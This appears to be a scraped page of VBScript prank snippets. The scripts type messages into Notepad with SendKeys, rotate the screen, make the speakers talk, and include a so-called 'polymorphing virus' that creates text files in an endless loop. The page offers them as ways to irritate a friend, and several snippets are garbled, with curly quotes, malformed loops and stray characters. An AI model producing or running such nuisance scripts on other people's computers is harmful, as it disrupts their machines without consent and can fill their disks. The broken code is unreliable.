You are on page 1of 4

Beginning

Set x = WScript.CreateObject("WScript.Shell")

x.Run "notepad.exe",9

wscript.sleep 500

hack keyboard
Set x = WScript.CreateObject("WScript.Shell")

x.Run "notepad.exe",9

wscript.sleep 500

x.SendKeys”Poda Venna”

Full Screen
Set x = WScript.CreateObject("WScript.Shell")

x.Run "notepad.exe",3

wscript.sleep 500

x.SendKeys”Poda Venna”

repeating
Set x = WScript.CreateObject("WScript.Shell")

for i 1 to 5 // choose larger number for treat

x.Run "notepad.exe",3

wscript.sleep 500

x.SendKeys ”Poda Venna”

next

Polymorphing Virus Creation


Task Manager – Microsoft windows host script
Steps:
Create a folder
Code:
do

file = “location” & val & “.txt”

Set obj = CreateObject(“Scripting.FilesSystemObject”)

Set write = obj.CreateTextFile(file, True)

v
write.Write(“virus”)

write.Close

Set obj = nothing

val=val+1

loop

For terminating go to task manager and kill the Microsoft scriprt code

Love Letter
l

Irritate your friend


Set x = WScript.CreateObject("WScript.Shell")

Dim msg: msg = "Un Moonji Ku Love Letter Kekuda"

for i=1 to Len(msg)

wscript.sleep 500

x.Run"notepad.exe",3

x.SendKeys Mid(msg,i,1)

next

Warning-1
Set x = WScript.CreateObject("WScript.Shell")

WScript.Sleep 500

x.SendKeys “^%{LEFT}”

Warning-2
Set x = WScript.CreateObject("WScript.Shell")

WScript.Sleep 500

x.SendKeys “^%{UP}”

Speaker Attack

v
set ab=CreateObject(“SAPI.SpVoice”) \\ Speaker Appliacation Program Interface

ab.Speak “Friendship Day”

Voice
set ab=CreateObject(“SAPI.SpVoice”)
set ab.Voice = ab.GetVoices.Item(1)
ab.Speak “Friendship Day”
set ab.Voice = ab.GetVoices.Item(0)
ab.Speak “Friendship Day”

voice mixing
set ab=CreateObject(“SAPI.SpVoice”)
array1 = Array(“How”,”are”,”you”)
for i=0 to 3
j= I Mod 2
set ab.Voice = ab.GetVoices.Item(j)
ab.rate = i
ab.Speak array1(i)
next

Voice mix repeat


set ab=CreateObject(“SAPI.SpVoice”)
array1 = Array(“How”,”are”,”you”)
for k=0 to 10
for i=0 to 3
j= I Mod 2

v
set ab.Voice = ab.GetVoices.Item(j)
ab.rate =k
ab.Speak array1(i)
next
next

You might also like